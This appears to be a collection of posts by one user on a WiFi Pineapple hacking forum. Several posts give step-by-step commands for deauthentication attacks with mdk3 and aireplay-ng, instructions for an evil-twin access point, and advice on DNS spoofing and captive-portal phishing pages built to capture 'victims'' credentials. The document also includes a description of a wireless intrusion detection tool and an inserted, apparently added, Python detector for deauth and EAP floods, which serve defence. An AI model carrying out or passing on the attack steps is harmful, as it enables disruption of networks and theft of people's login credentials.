NullNull (Active Members) - Posts: 210, Days Won: 6

Posts posted by NullNull

  1. Thanks for all the support guys..... Just one last question... PROMISE :)

    Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing?

    echo {root_ap_bssid} > black.list

    mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

    Thanks

    echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid

    mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b)

    TYTecholust this is correct! I just want to add some details... At the black.list you can add as many APs as you like. The format of the file should be this:

    root@kiatogs:~# cat black.list
    CC:1A:FA:9F:3D:14
    C1:F4:56:7A:23:35
    38:22:FF:A2:65:F1
    root@kiatogs:~#
    

    If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use:

    mdk3 mon0 d -c 1,6,11,13 -b black.list
    

    This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13.

    If -c parameter is not declared mdk3 will hop in all channels to find those bssids.

    You can find out more by typing:

    mdk3 --fullhelp
    

    or:

    man mdk3
    
  2. As far as I am aware, this is incredibly difficult if not impossible to do.

    Maybe you are mistaking it with something else :unsure:

    Step 1

    Configure your AP to have exactly the same SSID, ENCRYPTION and PASSKEY as the root AP BUT a different channel. The channel of your AP should be at least 3 channels away from the root AP (e.g. if the root AP channel is 11, yours should be at most 7; I would have set it to 1).

    Step 2

    To deauth clients from the root AP you will need a second wireless card (e.g. wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack, use the same channel as the root AP. In this case new clients will connect to the AP with better/stronger signal quality/strength and the already connected clients will stay connected to the root AP.

    Run this to install mdk3

    opkg update
    opkg install mdk3
    

    and this to see mdk3 options

    mdk3 --fullhelp

    to run the deauth attack with mdk3 run:

    ifconfig wlan1 down
    airmon-ng start wlan1
    echo {root_ap_bssid} > black.list
    mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

    (replace {root_ap_bssid}, {monitor_int} and {root_ap_channel})

    If you still want to use aireplay-ng and deauth every client from the root AP run:

    ifconfig wlan1 down
    iwconfig wlan1 channel {root_ap_channel}
    airmon-ng start wlan1
    aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int}
    

    (replace {root_ap_channel}, {root_ap_bssid} and {monitor_int})

    Else if you want to deauth only one client run:

    ifconfig wlan1 down
    iwconfig wlan1 channel {root_ap_channel}
    airmon-ng start wlan1
    aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int}
    

    (replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})

  3. https://forums.hak5.org/index.php?/topic/31915-nodogsplash-redirecturl-command/?fromsearch=1

    Like this but instead of a web URL it can be directed to a page that has links to our favorite spoofed pages hosted on the pineapple in the form of file paths?

    No. This URL is used to redirect the client to the "real internet" when it has successfully logged in to the captive portal. You need to set up your phishing page at /etc/nodogsplash/splash.html

    1) Do a google search on how captive portals and nodogsplash work

    2) Use newbi3 infusion called Evil Portal.

    FYI: I guess you are using PHP for logging credentials. nodogsplash does not support PHP. Again, newbi3's channel on YouTube and some of his topics here will help you "overcome" it.

  4. Hello everyone,

    So I am playing with my pineapple the last few days trying to make a captive portal. I noticed that nodogsplash only redirects traffic when the pineapple has an internet connection. Also because of that, the pseudo-browser that iOS 6 and 7 (and now Android 4.4) use to detect captive portals is not popping up. Actually this is what I want... to make this pop-up browser appear every time one of those OSes connects, but without having my pineapple connected to the internet...

    It has something to do with the way nodogsplash sets up iptables (I think).

    If anyone has something to suggest I would appreciate it :)

  5. Description

    Wireless IDS is an open source tool written in Python that works on Linux. This tool may be useful to penetration testers, trainers and those who are interested and want to know more about wireless hacking. WIDS will sniff your surrounding air traffic for suspicious activities such as WEP/WPA/WPS attacking packets. It does the following:
    • Detect mass deauthentication sent to a client / access point; an unreasonable amount indicates a possible WPA attack for handshakes.
    • Continual sending of data to an access point using the broadcast MAC address, which indicates a possibility of WEP attacks
    • Unreasonable amount of communication between a wireless client and access point using EAP authentication, which indicates the possibility of a WPS bruteforce attack by Reaver / WPSCrack
    • Detection of changes in connection to another access point, which may indicate a connection to a Rogue AP (the user needs to assess the situation, e.g. whether the AP name is similar)

    Newly Added Features !!!

    • Display similar Access Point's name (SSID) which could have the possibility of WiFi 'Evil Twins'.
    • Display of probing SSID by wireless devices
    • Detection of Korek Chopchop packets sent by Aircrack-NG (WEP attacks)
    • Detection of Fragmentation PRGA packets sent by Aircrack-NG (WEP attacks)
    • Detection of possible WPA Downgrade attack by MDK3
    • Detection of possible Michael Shutdown exploitation (TKIP) by MDK3
    • Detection of Beacon flooding by MDK3
    • Detection of possible Authentication DoS by MDK3
    • Detection of possible association flooding
    • Detection of WPA Migration Attack by Aircrack-NG (WPA Attack)
    • Allow logging of events to file.
    • Allow disabling of displaying of probing devices
    • Wireless devices / Access point's manufacturer identification based on the MAC OUI database.

    Pictures: installation screenshot (02+-+Installation.png, image not included)
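    The first and third detections in the WIDS description above (mass deauthentication, and an EAP flood that suggests WPS brute forcing) amount to rate counting per BSSID over a sliding time window. The block below is an added illustration of that logic, not code from the WIDS project; the frame records, the 10-second window and the per-kind thresholds are all constructed/assumed values for the example.

```python
from collections import deque, defaultdict

# Constructed sample of already-parsed 802.11 frames: (time_s, kind, bssid, client).
# kind is "deauth", "eap" or "data". A real deployment would fill this from a sniffer.
SAMPLE_FRAMES = (
    [(0.01 * i, "deauth", "AA:BB:CC:DD:EE:01", "FF:FF:FF:FF:FF:FF") for i in range(60)]
    + [(0.5 + 0.02 * i, "eap", "AA:BB:CC:DD:EE:01", "11:22:33:44:55:66") for i in range(40)]
    + [(1.0, "deauth", "AA:BB:CC:DD:EE:02", "11:22:33:44:55:77"),   # normal: a single deauth
       (30.0, "deauth", "AA:BB:CC:DD:EE:02", "11:22:33:44:55:77")]  # ... and another much later
)

WINDOW_S = 10.0                           # assumed sliding-window length
THRESHOLDS = {"deauth": 20, "eap": 30}    # assumed frames-per-window per BSSID that trip an alert
LABELS = {"deauth": "possible WPA handshake capture (mass deauth)",
          "eap": "possible WPS brute force (EAP flood)"}


class WifiFloodDetector:
    """Keeps one sliding window of timestamps per (kind, bssid) and alerts once per burst."""

    def __init__(self, thresholds=THRESHOLDS, window_s=WINDOW_S):
        self.thresholds = thresholds
        self.window_s = window_s
        self.windows = defaultdict(deque)   # (kind, bssid) -> timestamps inside the window
        self.alerted = set()                # keys that already alerted for the current burst
        self.alerts = []

    def feed(self, t, kind, bssid, client):
        if kind not in self.thresholds:     # data frames etc. are not rate-checked here
            return None
        key = (kind, bssid)
        q = self.windows[key]
        q.append(t)
        while q and t - q[0] > self.window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= self.thresholds[kind]:
            if key in self.alerted:         # still the same burst: do not re-alert
                return None
            self.alerted.add(key)
            alert = {"time": t, "bssid": bssid, "kind": kind, "count": len(q), "note": LABELS[kind]}
            self.alerts.append(alert)
            return alert
        self.alerted.discard(key)           # rate fell below threshold: re-arm for the next burst
        return None


def scan(frames):
    """Run the detector over a batch of frames (sorted by time) and return all alerts."""
    det = WifiFloodDetector()
    for t, kind, bssid, client in sorted(frames):
        det.feed(t, kind, bssid, client)
    return det.alerts
```

With the constructed sample, scan() reports one deauth alert and one EAP alert for AA:BB:CC:DD:EE:01 and nothing for AA:BB:CC:DD:EE:02, whose two deauth frames are 30 seconds apart.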

  6. That is DNSspoofing with a redirect to a phishing page... But the problem with spoofing all traffic to the pineapple (172.16.42.1 *) is that a lot of those apps use https. Wouldn't those still get through?

    Yes, you are correct! Many apps (eg Facebook app) are using https. I never use this method with my pineapple connected to the internet and none of the traffic passes through those apps so I forgot this detail.

  7. I am asking if there is a way I can de-authenticate android apps so when it is reopened it will either ask for their info to log in or will authenticate like the app was freshly started.

    I guess it's down to either some kind of cookie or session type thing or maybe some PHP voodoo.

    Neither of these will work. These apps are encrypting their data, which makes Man In The Middle Attacks pointless.

    Maybe look into DNS spoof and running your own phishing pages?

    In my experience this seems the only way. Spoofing all traffic (172.16.42.1 *) will not let the app connect to its servers, which will lead the app to show a "No Internet Connection" (even if the pineapple IS connected). After that 80% of the victims will try to use their browsers to check the internet connection and that is where your phishing page will appear.

    F.Y.I

    Apple devices check for an internet connection every time they connect to a network. If there is a captive portal in this network (or you are spoofing all traffic to your phishing page) a pseudo-browser will pop up and won't let the user do anything else (including using any of these apps) until it gets through the captive portal (or your phishing page by entering their credentials).

  8. I don't think that it has to be part of the firmware because people that are using a captive portal DO want that pseudo-browser to pop up.

    I posted it here because dnsspoof infusion already has an option of installing " Fake captive portal files " (for iOS and Windows)

  9. Until iOS 6 Apple's devices were just looking at .../library/test/success.html to check the internet connection. By creating the same html file at /www/library/test/ it was easy to fool the device into thinking it has an internet connection, BUT since iOS 7 is out this will not do the trick. iDevices are now checking for an internet connection using a list that contains over 200 servers. Here is a link with the solution for devices using lighttpd.

    http://forum.daviddarts.com/read.php?9,8879,8910#msg-8910

    Pineapple is using uhttpd. Maybe whistlemaster can do some of his magic ;).

  10. I was playing with my pineapple (fw 3.0) after a long time and I was having some problems with the autostart feature. After some digging it turns out there is a wrong filepath at /pineapple/components/infusions/dnsspoof/includes/autostart.sh

    Original:

    dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> ${MYPATH}log/output_${MYTIME}.log &
    

    Correct:

    dnsspoof -i br-lan -f /etc/pineapple/spoofhost > /dev/null 2> ${MYPATH}log/output_${MYTIME}.log &
    

    It's very weird that no one noticed after such a long time!

    Is 1.1 the latest version? :/
